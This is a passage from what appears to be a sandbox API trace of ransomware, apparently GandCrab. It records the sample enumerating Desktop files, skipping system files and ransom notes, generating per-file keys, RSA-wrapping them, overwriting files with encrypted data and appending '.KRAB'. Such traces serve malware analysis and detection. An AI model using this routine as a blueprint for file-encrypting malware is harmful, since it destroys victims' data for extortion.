(lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x320 [0086.027] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.027] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.027] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\") returned 30 [0086.027] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\*" [0086.027] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\*", lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0x1023cb8 [0086.027] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.027] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0086.028] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.028] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.028] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0086.028] lstrcmpW (lpString1="0tLnSI5.docx", lpString2=".") returned 1 [0086.028] lstrcmpW (lpString1="0tLnSI5.docx", lpString2="..") returned 1 [0086.028] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpString2="0tLnSI5.docx" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\0tLnSI5.docx") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\0tLnSI5.docx" [0086.028] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0086.028] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\0tLnSI5.docx.KRAB") returned 47 [0086.028] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\0tLnSI5.docx") returned 42 [0086.028] lstrlenW (lpString=".docx") returned 5 [0086.028] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.029] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".docx ") returned 6 [0086.029] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.029] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\0tLnSI5.docx") returned 42 [0086.029] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\0tLnSI5.docx") returned 42 [0086.029] lstrcmpiW (lpString1="0tLnSI5.docx", lpString2="desktop.ini") returned -1 [0086.029] lstrcmpiW (lpString1="0tLnSI5.docx", lpString2="autorun.inf") returned -1 [0086.029] lstrcmpiW (lpString1="0tLnSI5.docx", lpString2="ntuser.dat") returned -1 [0086.029] lstrcmpiW (lpString1="0tLnSI5.docx", lpString2="iconcache.db") returned -1 [0086.029] lstrcmpiW (lpString1="0tLnSI5.docx", lpString2="bootsect.bak") returned -1 [0086.029] lstrcmpiW (lpString1="0tLnSI5.docx", lpString2="boot.ini") returned -1 [0086.029] lstrcmpiW (lpString1="0tLnSI5.docx", lpString2="ntuser.dat.log") returned -1 [0086.029] lstrcmpiW (lpString1="0tLnSI5.docx", lpString2="thumbs.db") returned -1 [0086.029] lstrcmpiW (lpString1="0tLnSI5.docx", lpString2="KRAB-DECRYPT.html") returned -1 [0086.029] lstrcmpiW (lpString1="0tLnSI5.docx", lpString2="KRAB-DECRYPT.txt") returned -1 [0086.029] lstrcmpiW (lpString1="0tLnSI5.docx", lpString2="CRAB-DECRYPT.txt") returned -1 [0086.029] lstrcmpiW (lpString1="0tLnSI5.docx", lpString2="ntldr") returned -1 [0086.029] lstrcmpiW (lpString1="0tLnSI5.docx", lpString2="NTDETECT.COM") returned -1 [0086.030] lstrcmpiW (lpString1="0tLnSI5.docx", lpString2="Bootfont.bin") returned -1 [0086.030] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.030] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1011018) returned 1 [0086.032] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0086.032] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0086.032] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0086.032] CryptGenRandom (in: hProv=0x1011018, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0086.032] CryptReleaseContext (hProv=0x1011018, dwFlags=0x0) returned 1 [0086.032] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.033] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1011700) returned 1 [0086.034] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0086.035] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0086.035] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0086.035] CryptGenRandom (in: hProv=0x1011700, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0086.035] CryptReleaseContext (hProv=0x1011700, dwFlags=0x0) returned 1 [0086.035] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.035] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1010a40) returned 1 [0086.037] CryptImportKey (in: hProv=0x1010a40, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x10235f8) returned 1 [0086.037] CryptGetKeyParam (in: hKey=0x10235f8, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0086.037] CryptEncrypt (in: hKey=0x10235f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0086.037] GetLastError () returned 0x0 [0086.037] CryptDestroyKey (hKey=0x10235f8) returned 1 [0086.037] CryptReleaseContext (hProv=0x1010a40, dwFlags=0x0) returned 1 [0086.037] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1010c60) returned 1 [0086.039] CryptImportKey (in: hProv=0x1010c60, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x1022ff8) returned 1 [0086.039] CryptGetKeyParam (in: hKey=0x1022ff8, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0086.039] CryptEncrypt (in: hKey=0x1022ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0086.039] GetLastError () returned 0x0 [0086.039] CryptDestroyKey (hKey=0x1022ff8) returned 1 [0086.039] CryptReleaseContext (hProv=0x1010c60, dwFlags=0x0) returned 1 [0086.039] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\0tLnSI5.docx" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\0tlnsi5.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0086.040] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0086.040] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0086.041] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x17605, lpOverlapped=0x0) returned 1 [0086.074] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffe89fb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.075] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x17605, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x17605, lpOverlapped=0x0) returned 1 [0086.075] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0086.075] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.079] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.080] CloseHandle (hObject=0x434) returned 1 [0086.080] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.080] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\0tLnSI5.docx" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\0tlnsi5.docx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\0tLnSI5.docx.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\0tlnsi5.docx.krab")) returned 1 [0086.081] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.081] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0086.081] lstrcmpW (lpString1="A-Vq6ykpPnUoE-.mp3", lpString2=".") returned 1 [0086.081] lstrcmpW (lpString1="A-Vq6ykpPnUoE-.mp3", lpString2="..") returned 1 [0086.081] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpString2="A-Vq6ykpPnUoE-.mp3" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\A-Vq6ykpPnUoE-.mp3") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\A-Vq6ykpPnUoE-.mp3" [0086.081] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0086.082] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\A-Vq6ykpPnUoE-.mp3.KRAB") returned 53 [0086.082] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\A-Vq6ykpPnUoE-.mp3") returned 48 [0086.082] lstrlenW (lpString=".mp3") returned 4 [0086.082] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.082] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".mp3 ") returned 5 [0086.082] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.083] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\A-Vq6ykpPnUoE-.mp3") returned 48 [0086.083] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\A-Vq6ykpPnUoE-.mp3") returned 48 [0086.083] lstrcmpiW (lpString1="A-Vq6ykpPnUoE-.mp3", lpString2="desktop.ini") returned -1 [0086.083] lstrcmpiW (lpString1="A-Vq6ykpPnUoE-.mp3", lpString2="autorun.inf") returned 1 [0086.083] lstrcmpiW (lpString1="A-Vq6ykpPnUoE-.mp3", lpString2="ntuser.dat") returned -1 [0086.083] lstrcmpiW (lpString1="A-Vq6ykpPnUoE-.mp3", lpString2="iconcache.db") returned -1 [0086.083] lstrcmpiW (lpString1="A-Vq6ykpPnUoE-.mp3", lpString2="bootsect.bak") returned -1 [0086.083] lstrcmpiW (lpString1="A-Vq6ykpPnUoE-.mp3", lpString2="boot.ini") returned -1 [0086.083] lstrcmpiW (lpString1="A-Vq6ykpPnUoE-.mp3", lpString2="ntuser.dat.log") returned -1 [0086.083] lstrcmpiW (lpString1="A-Vq6ykpPnUoE-.mp3", lpString2="thumbs.db") returned -1 [0086.083] lstrcmpiW (lpString1="A-Vq6ykpPnUoE-.mp3", lpString2="KRAB-DECRYPT.html") returned -1 [0086.083] lstrcmpiW (lpString1="A-Vq6ykpPnUoE-.mp3", lpString2="KRAB-DECRYPT.txt") returned -1 [0086.083] lstrcmpiW (lpString1="A-Vq6ykpPnUoE-.mp3", lpString2="CRAB-DECRYPT.txt") returned -1 [0086.083] lstrcmpiW (lpString1="A-Vq6ykpPnUoE-.mp3", lpString2="ntldr") returned -1 [0086.083] lstrcmpiW (lpString1="A-Vq6ykpPnUoE-.mp3", lpString2="NTDETECT.COM") returned -1 [0086.083] lstrcmpiW (lpString1="A-Vq6ykpPnUoE-.mp3", lpString2="Bootfont.bin") returned -1 [0086.083] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.083] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x10110a0) returned 1 [0086.085] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0086.085] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0086.086] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0086.086] CryptGenRandom (in: hProv=0x10110a0, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0086.086] CryptReleaseContext (hProv=0x10110a0, dwFlags=0x0) returned 1 [0086.086] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.086] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010df8) returned 1 [0086.087] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0086.088] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0086.088] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0086.088] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0086.088] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0086.088] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.089] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011238) returned 1 [0086.090] CryptImportKey (in: hProv=0x1011238, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x1023278) returned 1 [0086.090] CryptGetKeyParam (in: hKey=0x1023278, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0086.090] CryptEncrypt (in: hKey=0x1023278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0086.091] GetLastError () returned 0x0 [0086.091] CryptDestroyKey (hKey=0x1023278) returned 1 [0086.091] CryptReleaseContext (hProv=0x1011238, dwFlags=0x0) returned 1 [0086.091] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011700) returned 1 [0086.092] CryptImportKey (in: hProv=0x1011700, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x1022ff8) returned 1 [0086.092] CryptGetKeyParam (in: hKey=0x1022ff8, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0086.092] CryptEncrypt (in: hKey=0x1022ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0086.093] GetLastError () returned 0x0 [0086.093] CryptDestroyKey (hKey=0x1022ff8) returned 1 [0086.093] CryptReleaseContext (hProv=0x1011700, dwFlags=0x0) returned 1 [0086.093] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\A-Vq6ykpPnUoE-.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\a-vq6ykppnuoe-.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0086.093] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0086.094] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0086.094] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x10424, lpOverlapped=0x0) returned 1 [0086.108] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffefbdc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.108] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x10424, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x10424, lpOverlapped=0x0) returned 1 [0086.117] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0086.117] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.121] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.121] CloseHandle (hObject=0x434) returned 1 [0086.121] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.122] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\A-Vq6ykpPnUoE-.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\a-vq6ykppnuoe-.mp3"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\A-Vq6ykpPnUoE-.mp3.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\a-vq6ykppnuoe-.mp3.krab")) returned 1 [0086.123] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.123] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0086.123] lstrcmpW (lpString1="bgAiE7VaTbfEUdFpH.mkv", lpString2=".") returned 1 [0086.123] lstrcmpW (lpString1="bgAiE7VaTbfEUdFpH.mkv", lpString2="..") returned 1 [0086.123] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\", lpString2="bgAiE7VaTbfEUdFpH.mkv" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\bgAiE7VaTbfEUdFpH.mkv") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\bgAiE7VaTbfEUdFpH.mkv" [0086.123] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0086.123] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\bgAiE7VaTbfEUdFpH.mkv.KRAB") returned 56 [0086.123] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\bgAiE7VaTbfEUdFpH.mkv") returned 51 [0086.123] lstrlenW (lpString=".mkv") returned 4 [0086.124] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.124] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".mkv ") returned 5 [0086.124] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.124] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\bgAiE7VaTbfEUdFpH.mkv") returned 51 [0086.124] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\bgAiE7VaTbfEUdFpH.mkv") returned 51 [0086.124] lstrcmpiW (lpString1="bgAiE7VaTbfEUdFpH.mkv", lpString2="desktop.ini") returned -1 [0086.125] lstrcmpiW (lpString1="bgAiE7VaTbfEUdFpH.mkv", lpString2="autorun.inf") returned 1 [0086.125] lstrcmpiW (lpString1="bgAiE7VaTbfEUdFpH.mkv", lpString2="ntuser.dat") returned -1 [0086.125] lstrcmpiW (lpString1="bgAiE7VaTbfEUdFpH.mkv", lpString2="iconcache.db") returned -1 [0086.125] lstrcmpiW (lpString1="bgAiE7VaTbfEUdFpH.mkv", lpString2="bootsect.bak") returned -1 [0086.125] lstrcmpiW (lpString1="bgAiE7VaTbfEUdFpH.mkv", lpString2="boot.ini") returned -1 [0086.125] lstrcmpiW (lpString1="bgAiE7VaTbfEUdFpH.mkv", lpString2="ntuser.dat.log") returned -1 [0086.125] lstrcmpiW (lpString1="bgAiE7VaTbfEUdFpH.mkv", lpString2="thumbs.db") returned -1 [0086.125] lstrcmpiW (lpString1="bgAiE7VaTbfEUdFpH.mkv", lpString2="KRAB-DECRYPT.html") returned -1 [0086.125] lstrcmpiW (lpString1="bgAiE7VaTbfEUdFpH.mkv", lpString2="KRAB-DECRYPT.txt") returned -1 [0086.125] lstrcmpiW (lpString1="bgAiE7VaTbfEUdFpH.mkv", lpString2="CRAB-DECRYPT.txt") returned -1 [0086.125] lstrcmpiW (lpString1="bgAiE7VaTbfEUdFpH.mkv", lpString2="ntldr") returned -1 [0086.125] lstrcmpiW (lpString1="bgAiE7VaTbfEUdFpH.mkv", lpString2="NTDETECT.COM") returned -1 [0086.125] lstrcmpiW (lpString1="bgAiE7VaTbfEUdFpH.mkv", lpString2="Bootfont.bin") returned -1 [0086.125] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0086.125] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1011458) returned 1 [0086.127] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0086.127] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0086.128] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0086.128] CryptGenRandom (in: hProv=0x1011458, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0086.128] CryptReleaseContext (hProv=0x1011458, dwFlags=0x0) returned 1 [0086.128] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.128] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1011898) returned 1 [0086.130] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0086.130] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0086.130] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0086.130] CryptGenRandom (in: hProv=0x1011898, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0086.130] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0086.130] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.131] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011898) returned 1 [0086.132] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x10234f8) returned 1 [0086.132] CryptGetKeyParam (in: hKey=0x10234f8, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0086.132] CryptEncrypt (in: hKey=0x10234f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0086.133] GetLastError () returned 0x0 [0086.133] CryptDestroyKey (hKey=0x10234f8) returned 1 [0086.133] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0086.133] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1010df8) returned 1 [0086.134] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0x1022ff8) returned 1 [0086.134] CryptGetKeyParam (in: hKey=0x1022ff8, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0086.134] CryptEncrypt (in: hKey=0x1022ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0086.135] GetLastError () returned 0x0 [0086.135] CryptDestroyKey (hKey=0x1022ff8) returned 1 [0086.135] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0086.135] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\bgAiE7VaTbfEUdFpH.mkv" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\bgaie7vatbfeudfph.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0086.135] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0086.136] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0086.136] ReadFile (in: hFile=0x434, 